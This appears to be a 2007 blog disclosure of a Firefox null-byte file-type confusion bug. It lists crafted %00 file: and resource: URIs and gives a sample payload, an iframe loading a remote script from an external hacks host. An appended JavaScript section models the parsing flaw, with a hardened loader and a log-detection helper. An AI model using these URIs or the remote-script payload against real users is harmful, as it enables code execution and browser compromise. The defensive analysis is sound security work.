Firefox Remote & Local Code Execution 0day
By secgeeks - Posted on June 12th, 2007

I found this vulnerability in Firefox moments ago while I was playing with the urlbar. It seems Firefox is vulnerable to null byte file type corruption: the part of the path before an encoded null byte (%00) selects the file that gets loaded, while the extension after the %00 decides how Firefox treats the content. It is possible to load a file as a different file type and trick Firefox into executing it as such. Is this dangerous? Yeah, it's pretty bad.

Pointers that are vulnerable:
file:///
resource:

Use:
[uri]/[filelocation]/[file][.ext]%00[.ext]

Example:
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html
or:
resource:///README.txt%00.html

More filetypes:
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.js
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.pdf
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.doc
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xls
probably every filetype.

Oh and: file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xpi :)

This could lead to various exploits, to name a few:
- DoSing a user (the firefox.exe example above almost does it)
- Code execution
- File access
- Trojan activation
- Virus activation
- Reflected Cross Site Scripting (RXSS)
- Cross Site Request Forgery (CSRF)

Another example:
It is possible to turn regular stored .txt files into full JavaScript HTML zombies:
file:///[filelocation]/troy.txt%00.html

troy.txt could contain:
/* bunch of malicious JavaScript */
or:
<html><iframe name="bla" src="http://www.0x000000.com/hacks/?troy.js" width="100%" height="900"></iframe></html>

Well, I guess you get the point: nasty.
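Added example, not code from the original post and not Firefox's own code: a small JavaScript model of the parsing split behind this trick. One routine guesses the content type from the extension of the decoded path, the way a loader that keys off the last ".ext" would, while another cuts the path at the first NUL the way a C-string file API does. Feeding both the same URL shows them disagreeing about what "firefox.exe%00.html" is, which is exactly what lets a local file be rendered as a different type. The hardened variant refuses any decoded path containing a control character and types the file from the exact string the file system will open, so the two views can never diverge; a third routine flags the "%00.ext" shape in logs. The MIME table, the function names, the /home/user/troy.txt path and the sample URL list are assumptions for the demo. Note that every URL on this page is a file: or resource: URI, so what is being demonstrated is how an already readable local file gets interpreted.

```javascript
// Added example, not code from the original post or from Firefox.
// Models why "firefox.exe%00.html" is opened as one file but typed as another.

// Assumed minimal extension -> MIME table for the demo (not Firefox's real one).
const MIME_BY_EXT = {
  html: "text/html",
  js: "application/x-javascript",
  pdf: "application/pdf",
  txt: "text/plain",
  exe: "application/octet-stream",
  xpi: "application/x-xpinstall",
};

// Decoded path of a file: or resource: URL. decodeURIComponent turns %00 into
// a real U+0000 inside the JavaScript string, and JS strings happily keep it.
function decodedPath(urlString) {
  return decodeURIComponent(new URL(urlString).pathname);
}

// Type guess the way a naive loader does it: the extension after the last "."
// of the whole decoded name. "firefox.exe\u0000.html" -> "html".
function extensionOf(path) {
  const base = path.slice(path.lastIndexOf("/") + 1);
  const dot = base.lastIndexOf(".");
  return dot === -1 ? "" : base.slice(dot + 1).toLowerCase();
}

// What a C-string file API opens: everything up to the first NUL byte.
// "firefox.exe\u0000.html" -> "firefox.exe"; the ".html" is never seen.
function nulTruncated(path) {
  const nul = path.indexOf("\u0000");
  return nul === -1 ? path : path.slice(0, nul);
}

// Vulnerable composition: two views of the same path that disagree.
function naiveLoad(urlString) {
  const path = decodedPath(urlString);
  return {
    opened: nulTruncated(path),
    renderedAs: MIME_BY_EXT[extensionOf(path)] || "application/octet-stream",
  };
}

// Hardened composition: reject C0 controls (NUL included) and DEL outright,
// and type the file from the exact string handed to the file system. Returns
// null for a rejected URL so a caller cannot fall through to a default type.
function hardenedLoad(urlString) {
  const path = decodedPath(urlString);
  if (/[\u0000-\u001f\u007f]/.test(path)) return null;
  return {
    opened: path,
    renderedAs: MIME_BY_EXT[extensionOf(path)] || "application/octet-stream",
  };
}

// Detection helper for proxy or access logs: true when the decoded path has a
// NUL followed by nothing but a second extension, the shape used on this page.
function looksLikeNulTypeSwap(urlString) {
  const path = decodedPath(urlString);
  const nul = path.indexOf("\u0000");
  return nul !== -1 && /^\.[A-Za-z0-9]+$/.test(path.slice(nul + 1));
}

// Constructed sample URLs (shapes taken from this page; the troy.txt location
// is an assumption).
const SAMPLES = [
  "file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html",
  "resource:///README.txt%00.html",
  "file:///home/user/troy.txt%00.html",
  "file:///home/user/troy.txt",
];

for (const u of SAMPLES) {
  console.log(u);
  console.log("  naive:    ", naiveLoad(u));
  console.log("  hardened: ", hardenedLoad(u));
  console.log("  flagged:  ", looksLikeNulTypeSwap(u));
}
```

The point of the hardened variant is not the regex but the ordering: the content type is derived from the same string that is opened, after the string has been validated, so no later component can see a different name than the one the check approved. Rejecting rather than stripping the NUL matters too, since truncating silently would just recreate the naive behaviour one layer up.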